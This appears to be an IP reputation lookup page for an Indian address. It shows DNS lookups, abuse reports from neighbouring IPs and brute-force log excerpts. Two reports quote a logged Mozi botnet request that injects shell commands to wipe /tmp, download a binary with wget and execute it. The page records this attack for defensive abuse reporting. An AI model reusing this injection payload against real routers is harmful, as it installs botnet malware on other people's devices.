202.83.42.136 - IPInfo

Basic Info

City: Alappuzha

Region: Kerala

Country: India

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
202.83.42.227	attackbotsspam	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: 227.42.83.202.asianet.co.in.	2020-10-08 03:49:55
202.83.42.202	attackbots	Unwanted checking 80 or 443 port ...	2020-10-07 21:00:15
202.83.42.227	attackspambots	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: 227.42.83.202.asianet.co.in.	2020-10-07 20:07:19
202.83.42.202	attackbotsspam	Unwanted checking 80 or 443 port ...	2020-10-07 12:45:48
202.83.42.105	attackbots	Tried to find non-existing directory/file on the server	2020-10-06 01:16:40
202.83.42.105	attackbots	Tried to find non-existing directory/file on the server	2020-10-05 17:09:46
202.83.42.68	attackbotsspam	202.83.42.68 - - [29/Sep/2020:21:33:55 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world" ...	2020-10-01 02:25:56
202.83.42.68	attack	202.83.42.68 - - [29/Sep/2020:21:33:55 +0100] 80 "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 403 824 "-" "Hello, world" ...	2020-09-30 18:35:00
202.83.42.243	attack	GPON Home Routers Remote Code Execution Vulnerability	2020-09-25 03:09:39
202.83.42.243	attack	GPON Home Routers Remote Code Execution Vulnerability	2020-09-24 18:52:39
202.83.42.132	attackbotsspam	Netgear DGN Device Remote Command Execution Vulnerability	2020-09-21 00:46:17
202.83.42.132	attackbots	Netgear DGN Device Remote Command Execution Vulnerability	2020-09-20 16:41:10
202.83.42.180	attackspambots	Mirai and Reaper Exploitation Traffic	2020-09-16 21:19:50
202.83.42.196	attackspam	Mirai and Reaper Exploitation Traffic	2020-09-16 21:19:28
202.83.42.180	attack	Mirai and Reaper Exploitation Traffic	2020-09-16 13:49:41

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 202.83.42.136
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61275
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;202.83.42.136.			IN	A

;; AUTHORITY SECTION:
.			546	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020091402 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Sep 15 09:03:45 CST 2020
;; MSG SIZE  rcvd: 117

Host info

136.42.83.202.in-addr.arpa domain name pointer 136.42.83.202.asianet.co.in.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
136.42.83.202.in-addr.arpa	name = 136.42.83.202.asianet.co.in.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
60.182.198.63	attackbots	Aug 29 01:48:27 localhost postfix/smtpd\[1991\]: warning: unknown\[60.182.198.63\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 01:48:35 localhost postfix/smtpd\[1991\]: warning: unknown\[60.182.198.63\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 01:48:47 localhost postfix/smtpd\[1991\]: warning: unknown\[60.182.198.63\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 01:49:02 localhost postfix/smtpd\[1991\]: warning: unknown\[60.182.198.63\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 01:49:10 localhost postfix/smtpd\[1991\]: warning: unknown\[60.182.198.63\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2019-08-29 12:52:42
141.98.9.130	attack	Aug 29 06:44:28 relay postfix/smtpd\[22145\]: warning: unknown\[141.98.9.130\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 06:44:40 relay postfix/smtpd\[17718\]: warning: unknown\[141.98.9.130\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 06:45:16 relay postfix/smtpd\[20741\]: warning: unknown\[141.98.9.130\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 06:45:28 relay postfix/smtpd\[30740\]: warning: unknown\[141.98.9.130\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 29 06:46:04 relay postfix/smtpd\[19823\]: warning: unknown\[141.98.9.130\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2019-08-29 12:48:39
68.183.228.39	attackspambots	Aug 29 05:54:50 ArkNodeAT sshd\[29230\]: Invalid user seren from 68.183.228.39 Aug 29 05:54:50 ArkNodeAT sshd\[29230\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.228.39 Aug 29 05:54:52 ArkNodeAT sshd\[29230\]: Failed password for invalid user seren from 68.183.228.39 port 57438 ssh2	2019-08-29 12:29:14
5.45.6.66	attackspam	Aug 28 23:49:22 *** sshd[29341]: Invalid user change from 5.45.6.66	2019-08-29 12:39:10
77.221.82.127	attackbotsspam	Aug 29 06:35:21 vps647732 sshd[18678]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=77.221.82.127 Aug 29 06:35:23 vps647732 sshd[18678]: Failed password for invalid user cap from 77.221.82.127 port 56654 ssh2 ...	2019-08-29 12:57:24
49.232.46.135	attack	Aug 29 03:46:31 mail sshd\[29921\]: Invalid user adolph from 49.232.46.135 port 52672 Aug 29 03:46:31 mail sshd\[29921\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.232.46.135 Aug 29 03:46:33 mail sshd\[29921\]: Failed password for invalid user adolph from 49.232.46.135 port 52672 ssh2 Aug 29 03:49:17 mail sshd\[30119\]: Invalid user minecraft from 49.232.46.135 port 48222 Aug 29 03:49:17 mail sshd\[30119\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.232.46.135	2019-08-29 12:37:27
142.44.241.49	attack	Aug 28 14:32:50 hpm sshd\[29494\]: Invalid user student2 from 142.44.241.49 Aug 28 14:32:50 hpm sshd\[29494\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.ip-142-44-241.net Aug 28 14:32:53 hpm sshd\[29494\]: Failed password for invalid user student2 from 142.44.241.49 port 51908 ssh2 Aug 28 14:36:59 hpm sshd\[29805\]: Invalid user pentagon from 142.44.241.49 Aug 28 14:36:59 hpm sshd\[29805\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.ip-142-44-241.net	2019-08-29 13:06:39
202.163.126.134	attackbots	Aug 29 04:08:49 hb sshd\[30695\]: Invalid user jim from 202.163.126.134 Aug 29 04:08:49 hb sshd\[30695\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.163.126.134 Aug 29 04:08:51 hb sshd\[30695\]: Failed password for invalid user jim from 202.163.126.134 port 39388 ssh2 Aug 29 04:13:51 hb sshd\[31071\]: Invalid user smmsp from 202.163.126.134 Aug 29 04:13:51 hb sshd\[31071\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.163.126.134	2019-08-29 12:16:12
120.92.102.121	attackspam	Aug 29 06:13:34 plex sshd[16855]: Invalid user ts3 from 120.92.102.121 port 55360	2019-08-29 12:19:58
179.214.179.1	attackspam	Aug 29 03:54:48 vps sshd[25325]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=179.214.179.1 Aug 29 03:54:50 vps sshd[25325]: Failed password for invalid user mondal from 179.214.179.1 port 58358 ssh2 Aug 29 04:02:11 vps sshd[25703]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=179.214.179.1 ...	2019-08-29 13:11:31
103.106.137.130	attackbots	Automatic report - Port Scan Attack	2019-08-29 12:36:51
185.23.65.7	attackbots	Automatic report - Port Scan Attack	2019-08-29 12:26:52
114.235.59.234	attackspam	Unauthorised access (Aug 29) SRC=114.235.59.234 LEN=40 TTL=48 ID=46911 TCP DPT=8080 WINDOW=28076 SYN Unauthorised access (Aug 28) SRC=114.235.59.234 LEN=40 TTL=48 ID=47268 TCP DPT=8080 WINDOW=16694 SYN Unauthorised access (Aug 27) SRC=114.235.59.234 LEN=40 TTL=49 ID=10950 TCP DPT=8080 WINDOW=16694 SYN	2019-08-29 13:03:14
94.226.255.121	attackspambots	2019-08-29T01:49:17.662506centos sshd\[32742\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=94-226-255-121.access.telenet.be user=root 2019-08-29T01:49:19.517307centos sshd\[32742\]: Failed password for root from 94.226.255.121 port 33788 ssh2 2019-08-29T01:49:22.834275centos sshd\[32742\]: Failed password for root from 94.226.255.121 port 33788 ssh2	2019-08-29 12:40:39
68.183.124.72	attackspambots	Aug 29 05:36:14 icinga sshd[21615]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.124.72 Aug 29 05:36:16 icinga sshd[21615]: Failed password for invalid user dq from 68.183.124.72 port 57984 ssh2 Aug 29 05:40:14 icinga sshd[24450]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.124.72 ...	2019-08-29 12:46:41

Recently Reported IPs

132.46.115.2	52.51.99.222	211.254.128.243	35.79.252.199
79.235.93.250	221.30.12.197	222.230.162.6	208.20.178.241
210.55.152.140	147.139.197.141	90.93.240.162	108.225.211.181
121.187.224.105	173.95.41.245	84.75.208.30	47.36.98.13
107.127.80.204	83.218.50.197	124.199.143.139	39.218.18.135